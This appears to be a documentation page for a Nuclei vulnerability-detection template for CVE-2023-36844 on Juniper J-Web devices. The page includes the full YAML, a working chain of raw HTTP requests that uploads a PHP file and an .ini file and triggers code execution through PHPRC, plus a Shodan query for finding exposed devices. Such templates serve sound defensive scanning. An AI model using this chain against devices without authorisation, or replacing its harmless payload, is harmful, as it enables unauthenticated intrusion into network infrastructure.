Juniper Devices - Remote Code Execution
ID: CVE-2023-36844
Severity: medium
Author: princechaddha,ritikchaddha
Tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev
Description
Section titled “Description”Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.
YAML Source
Section titled “YAML Source”id: CVE-2023-36844
info: name: Juniper Devices - Remote Code Execution author: princechaddha,ritikchaddha severity: medium description: | Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Juniper Devices. remediation: | Apply the latest security patches and firmware updates provided by Juniper Networks to mitigate this vulnerability. reference: - https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/ - https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844 - https://supportportal.juniper.net/JSA72300 - http://packetstormsecurity.com/files/174397/Juniper-JunOS-SRX-EX-Remote-Code-Execution.html - http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2023-36844 cwe-id: CWE-473 epss-score: 0.74086 epss-percentile: 0.98118 cpe: cpe:2.3:h:juniper:srx100:-:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: juniper product: srx100 shodan-query: title:"Juniper Web Device Manager" tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kevvariables: string: "CVE-2023-36844" payload: "('<?php echo md5('{{string}}');unlink(__FILE__);?>')"
http: - raw: - | POST /webauth_operation.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
rs=do_upload&rsargs[]=[{"fileData": "data:text/html;base64,{{base64(payload)}}", "fileName": "{{rand_base(5, "abc")}}.php", "csize": {{len(payload)}}}] - | POST /webauth_operation.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
rs=do_upload&rsargs[]=[{"fileName": "{{rand_base(5, "abc")}}.ini", "fileData": "data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}", "csize": "97" }] - | GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body_2 words: - '"original_fileName":' - '"converted_fileName":' condition: and
- type: word part: body_3 words: - '{{md5(string)}}'
extractors: - type: regex part: body_1 name: phpfile regex: - "([a-f0-9]{64}\\.php)" internal: true
- type: regex part: body_2 name: inifile regex: - "([a-f0-9]{64}\\.ini)" internal: true# digest: 4a0a00473045022047f487728111d87bfcbb1056c6ed357d2d27e99c6696fe3f91ec3698f2d4b6d6022100b818eed144a9600afd50f8504f53a902056159ea017f05cb2a32a3f06a7f61f9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-36844.yaml"